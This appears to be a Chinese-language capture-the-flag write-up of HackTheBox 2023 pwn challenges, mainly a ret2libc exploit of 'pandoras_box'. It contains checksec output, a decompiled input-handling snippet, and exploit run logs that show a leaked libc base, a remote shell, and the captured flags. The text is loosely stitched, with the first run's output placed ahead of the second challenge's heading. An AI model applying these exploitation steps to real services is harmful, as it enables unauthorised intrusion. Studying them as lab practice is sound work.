Arch: amd64-64-little RELRO: Full RELRO //不能覆盖GOT Stack: No canary found //没有栈堆保护 NX: NX enabled //栈堆无法执行 PIE: No PIE (0x400000) //address不变 RUNPATH: b'./glibc/'
$ python pwn_lab.py [+] Opening connection to 104.248.169.177 on port 31597: Done /home/yui/Desktop/pwn_lab.py:12: BytesWarning: Text is not bytes; assuming ASCII, no guarantees. See https://docs.pwntools.com/#bytes p.sendlineafter(b'>>','69') [*] Switching to interactive mode [-] YOU FAILED TO ESCAPE! \O/ | / \ ▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒ ▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒ ▒-▸ ▒ ▒ ▒ ▒-▸ ▒ ▒ ▒ ▒-▸ ▒ ▒ ▒ ▒-▸ ▒ ▒ ▒ ▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▲△▲△▲△▲△▲△▒ Congratulations on escaping! Here is a sacred spell to help you continue your journey: HTB{3sc4p3_fr0m_4b0v3} [*] Got EOF while reading in interactive
HTB-CA2023—PWN pwn_pandoras_box ret2libc
程序分析
一个经典的ret2libc,老样子,先分析程序开启的安全保护:
1 2 3 4 5 6
Arch: amd64-64-little RELRO: Full RELRO Stack: No canary found NX: NX enabled PIE: No PIE (0x400000) RUNPATH: b'./glibc/'
if ( v7 != 2 ) { fprintf(_bss_start, "%s\nWHAT HAVE YOU DONE?! WE ARE DOOMED!\n\n", "\x1B[1;31m"); exit(1312); } fwrite("\nInsert location of the library: ", 1uLL, 0x21uLL, _bss_start); fgets(s, 256, stdin); return fwrite( "\nWe will deliver the mythical box to the Library for analysis, thank you!\n\n", 1uLL, 0x4BuLL, _bss_start); }
[+] Opening connection to 144.126.196.198 on port 30070: Done [*] '/home/yui/Desktop/glibc/libc.so.6' Arch: amd64-64-little RELRO: Partial RELRO Stack: Canary found NX: NX enabled PIE: PIE enabled [*] '/home/yui/Desktop/pb' Arch: amd64-64-little RELRO: Full RELRO Stack: No canary found NX: NX enabled PIE: No PIE (0x400000) RUNPATH: b'./glibc/' [*] LIBC BASE: 0x7f86e9faa000 [*] Switching to interactive mode We will deliver the mythical box to the Library for analysis, thank you!
$ ls flag.txt glibc pb $ cat flag.txt HTB{r3turn_2_P4nd0r4?!}